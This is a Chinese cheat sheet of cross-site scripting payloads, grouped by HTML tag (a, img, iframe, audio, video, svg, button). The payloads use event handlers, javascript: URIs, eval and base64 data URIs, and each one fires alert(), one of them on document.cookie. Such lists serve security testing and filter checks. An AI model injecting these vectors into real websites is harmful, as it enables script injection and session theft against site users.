xss常用标签

<a> 标签

• <a href="javascript:alert(1)">test</a>
• <a href="x" onfocus="alert('xss');" autofocus="">xss</a>
• <a href="x" onclick=eval("alert('xss');")>xss</a>
• <a href="x" onmouseover="alert('xss');">xss</a>
• <a href="x" onmouseout="alert('xss');">xss</a>

<img>标签

• <img src=x onerror="alert(1)">
• <img src=x onerror=eval("alert(1)")>
• <img src=1 onmouseover="alert('xss');">
• <img src=1 onmouseout="alert('xss');">
• <img src=1 onclick="alert('xss');">

<iframe>标签

• <iframe src="javascript:alert(1)">test</iframe>
• <iframe onload="alert(document.cookie)"></iframe>
• <iframe onload="alert('xss');"></iframe>
• <iframe onload="base64,YWxlcnQoJ3hzcycpOw=="></iframe>
• <iframe onmouseover="alert('xss');"></iframe>
• <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

<audio> 标签

• <audio src=1 onerror=alert(1)>
• <audio><source src="x" onerror="alert('xss');"></audio>
• <audio controls onfocus=eval("alert('xss');") autofocus=""></audio>
• <audio controls onmouseover="alert('xss');"><source src="x"></audio>

<video>标签

• <video src=x onerror=alert(1)>
• <video><source onerror="alert('xss');"></video>
• <video controls onmouseover="alert('xss');"></video>
• <video controls onfocus="alert('xss');" autofocus=""></video>
• <video controls onclick="alert('xss');"></video>

<svg> 标签

• <svg onload=javascript:alert(1)>
• <svg onload="alert('xss');"></svg>

<button>标签

• <button onclick=alert(1)>
• <button onfocus="alert('xss');" autofocus="">xss</button>
•  <button onclick="alert('xss');">xss</button>
• <button onmouseover="alert('xss');">xss</button>
•  <button onmouseout="alert('xss');">xss</button>
•  <button onmouseup="alert('xss');">xss</button>
•  <button onmousedown="alert('xss');"></button>